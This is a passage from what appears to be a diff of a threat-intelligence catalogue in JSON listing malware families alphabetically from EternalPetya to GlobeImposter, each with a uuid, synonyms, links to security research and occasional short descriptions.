"https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" + ] + }, + "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", + "value": "EternalPetya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HighTide" + ], + "type": 
[], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", + "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", + "value": "EtumBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" + ] + }, + "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", + "value": "Evilbunny", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Vidgrab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" + ] + }, + "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", + "value": "EvilGrab", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CREstealer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", + "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", + "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", + "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" + ] + }, + "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", + "value": "EvilPony", + "description": "Privately modded version of the Pony stealer." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", + "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" + ] + }, + "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", + "value": "Evrial", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sabresac", + "Saber" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" + ] + }, + "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", + "value": "Excalibur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "74f8db32-799c-41e5-9815-6272908ede57", + "value": "MS Exchange Tool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ExtRat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" + ] + }, + "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", + "value": "Xtreme RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", + "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", + 
"http://blog.talosintel.com/2017/01/Eye-Pyramid.html" + ] + }, + "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", + "value": "Eye Pyramid", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WillExec" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", + "https://github.com/360netlab/DGA/issues/36", + "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", + "http://www.freebuf.com/column/153424.html" + ] + }, + "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", + "value": "FakeDGA", + "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." + }, + { + "meta": { + "synonyms": [ + "Braviax" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", + "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", + "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", + "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" + ] + }, + "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", + "value": "FakeRean", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" + ] + }, + "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", + "value": "FakeTC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", + 
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" + ] + }, + "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", + "value": "Fanny", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", + "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" + ] + }, + "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", + "value": "FantomCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", + "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", + "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" + ] + }, + "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", + "value": "FastPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", + "value": "Felismus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", + "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + ] + }, + "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", + "value": "Felixroot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cridex", + "Bugat" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", + "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", + "https://feodotracker.abuse.ch/", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" + ] + }, + "uuid": "66781866-f064-467d-925d-5e5f290352f0", + "value": "Feodo", + "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", + "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" + ] + }, + "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", + "value": "FF RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", + "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" + ] + }, + "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", + "value": "FileIce", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Poseidon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", + "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", + "https://blogs.cisco.com/security/talos/poseidon" + ] + }, + "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", + "value": "FindPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FinSpy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", + "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", + 
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + ] + }, + "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", + "value": "FinFisher RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", + "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" + ] + }, + "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", + "value": "Fireball", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", + "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" + ] + }, + "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", + "value": "FireCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", + "value": "FireMalv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", + "https://twitter.com/JaromirHorejsi/status/815949909648150528" + ] + }, + "uuid": 
"1ab17959-6254-49af-af26-d34e87073e49", + "value": "FirstRansom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://github.com/Coldzer0/Ammyy-v3", + "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" + ] + }, + "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", + "value": "FlawedAmmyy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", + "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", + "http://adelmas.com/blog/flokibot.php", + "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/", + "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", + "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" + ] + }, + "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", + "value": "FlokiBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", + 
"https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" + ] + }, + "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", + "value": "Floxif", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", + "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" + ] + }, + "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", + "value": "Flusihoc", + "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", + "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", + "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", + "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", + "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", + "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" + ] + }, + "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", + "value": "Fobber", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", + "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", + "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", + 
"http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" + ] + }, + "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", + "value": "Formbook", + "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." + }, + { + "meta": { + "synonyms": [ + "ffrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", + "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" + ] + }, + "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", + "value": "FormerFirstRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", + "value": "Freenki Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BitPaymer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", + "value": "FriedEx", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", + "https://sentinelone.com/blogs/sfg-furtims-parent/" + ] + }, + "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", + "value": "Furtim", + "description": "" + }, + { + "meta": { + "synonyms": [], + 
"type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" + ] + }, + "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", + "value": "GalaxyLoader", + "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" + }, + { + "meta": { + "synonyms": [ + "pios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", + "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" + ] + }, + "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", + "value": "gamapos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" + ] + }, + "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", + "value": "Gameover DGA", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ZeuS P2P", + "GOZ" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", + "https://www.wired.com/?p=2171700", + "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf", + "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", + "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", + "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" + ] + }, + "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", + "value": "Gameover P2P", + "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. 
According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" + ] + }, + "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", + "value": "Gamotrol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "GrandCrab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", + "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", + "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", + "http://asec.ahnlab.com/1145", + "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", + "https://isc.sans.edu/diary/23417", + "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", + "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" + ] + }, + "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", + "value": "win.gandcrab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", + "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" + ] + }, + "uuid": 
"591b2882-65ba-4629-9008-51ed3467510a", + "value": "Gaudox", + "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", + "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" + ] + }, + "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", + "value": "Gauss", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WhiteBear" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", + "https://securelist.com/introducing-whitebear/81638/", + "https://www.youtube.com/watch?v=Pvzhtjl86wc", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://github.com/eset/malware-ioc/tree/master/turla" + ] + }, + "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", + "value": "Gazer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", + "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + ] + }, + "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", + "value": "gcman", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", + "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", + "https://www.rekings.com/ispy-customers/" + ] + }, + "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", + "value": "GearInformer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Emotet", + "Heodo" + ], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" + ] + }, + "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", + "value": "Geodo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", + "value": "GetMail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getmypos" + ], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", + "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", + "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" + ] + }, + "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", + "value": "GetMyPass", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoreImpact (Modified)" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", + "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", + "https://www.coresecurity.com/core-impact" + ] + }, + "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", + "value": "Ghole", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Remosh" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://en.wikipedia.org/wiki/GhostNet" + ] + }, + "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", + "value": "Gh0stnet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ghost iBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", + "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", + "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" + ] + }, + "uuid": "6201c337-1599-4ced-be9e-651a624c20be", + "value": "GhostAdmin", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PCRat", + "Gh0st RAT" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://www.malware-traffic-analysis.net/2018/01/04/index.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "http://www.hexblog.com/?p=1248", + "https://blog.cylance.com/the-ghost-dragon" + ] + }, + "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", + "value": "Ghost RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wordpress Bruteforcer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", + "https://forum.exploit.in/pda/index.php/t102378.html" + ] + }, + "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", + "value": "Glasses", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", + "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" + ] + }, + "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", + "value": "GlassRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", + "https://blog.ensilo.com/globeimposter-ransomware-technical", + "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", + "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + 
